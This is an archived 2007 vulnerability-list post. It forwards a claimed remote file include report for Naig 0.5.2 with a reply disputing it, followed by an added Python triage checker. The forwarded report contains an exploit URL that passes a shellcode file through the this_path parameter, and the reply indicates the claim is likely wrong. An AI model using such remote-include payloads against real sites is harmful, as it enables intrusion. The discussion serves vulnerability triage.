[VIM] Fwd: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Fri Jan 12 16:59:35 EST 2007
Naig doesn't seem vulnerable since $this_path is set with the line below.
$this_path = substr($_SERVER["SCRIPT_FILENAME"],0,max(strrpos($_SERVER["SCRIPT_FILENAME"],"/"),strrpos($_SERVER["SCRIPT_FILENAME"],"\\"))+1);
/str0ke
---------- Forwarded message ----------
From: me you <r.5.7 at hotmail.com>
Date: Jan 12, 2007 3:50 PM
Subject: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
To: bugtraq at securityfocus.com
Cc: submit at milw0rm.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
Script : Naig
Version : 0.5.2
URL : http://mesh.dl.sourceforge.net/sourceforge/naig/naig-0.5.2.zip
Found By : -= BorN To K!LL =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
code in : index.php
require($this_path."config.inc.php");
require($this_path."Naig-includes/naig.inc.php");
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exlo!t :.
^^^^
www.site.com/[path]/index.php?this_path=shellcode.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GreeTz to : Dr.2 , Asbmay , ToOoFa , Q8^RoCK , SHiKaA .... All My
friends ..
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
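Added example, not part of the original thread or of Naig's code: a small Python triage check for the point made in the reply at the top of this message, that the reported `require($this_path...)` lines only take a request-supplied value if nothing assigns `$this_path` before them. The function name, the verdict labels and the placement of the assignment ahead of the two require lines are assumptions; the second sample is constructed for contrast.

```python
import re

# Request-controlled superglobals; $_SERVER["SCRIPT_FILENAME"] is not one of them.
REQUEST_SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=(?!=)(.*)")
INCLUDE = re.compile(r"\b(?:require|include)(?:_once)?\s*\(?\s*\$(\w+)")


def triage_includes(php_source):
    """Return [(line_no, variable, verdict)] for includes whose path starts with a variable."""
    assigned = {}  # variable -> "server-side" or "request-derived"
    depth = 0      # brace depth: an assignment inside a block may never execute
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        m = ASSIGN.match(line)
        if m and depth == 0:
            name, rhs = m.groups()
            assigned[name] = "request-derived" if REQUEST_SOURCES.search(rhs) else "server-side"
        m = INCLUDE.search(line)
        if m:
            # "unassigned": the value is whatever existed before this file ran,
            # which is the case a remote-include report has to rely on.
            findings.append((line_no, m.group(1), assigned.get(m.group(1), "unassigned")))
        depth += line.count("{") - line.count("}")
    return findings


# The three lines quoted in the thread, in the assumed order (assignment first).
AS_SHIPPED = r'''<?php
$this_path = substr($_SERVER["SCRIPT_FILENAME"],0,max(strrpos($_SERVER["SCRIPT_FILENAME"],"/"),strrpos($_SERVER["SCRIPT_FILENAME"],"\\"))+1);
require($this_path."config.inc.php");
require($this_path."Naig-includes/naig.inc.php");
'''

# Constructed contrast: the same file with the assignment removed.
WITHOUT_ASSIGNMENT = "\n".join(
    l for l in AS_SHIPPED.splitlines() if not l.startswith("$this_path"))

if __name__ == "__main__":
    for label, src in (("as shipped", AS_SHIPPED), ("assignment removed", WITHOUT_ASSIGNMENT)):
        for line_no, var, verdict in triage_includes(src):
            print(f"{label}: line {line_no} ${var} -> {verdict}")
```

A "server-side" verdict means the report needs no further work for that line; "unassigned" or "request-derived" means the include path still has to be traced by hand.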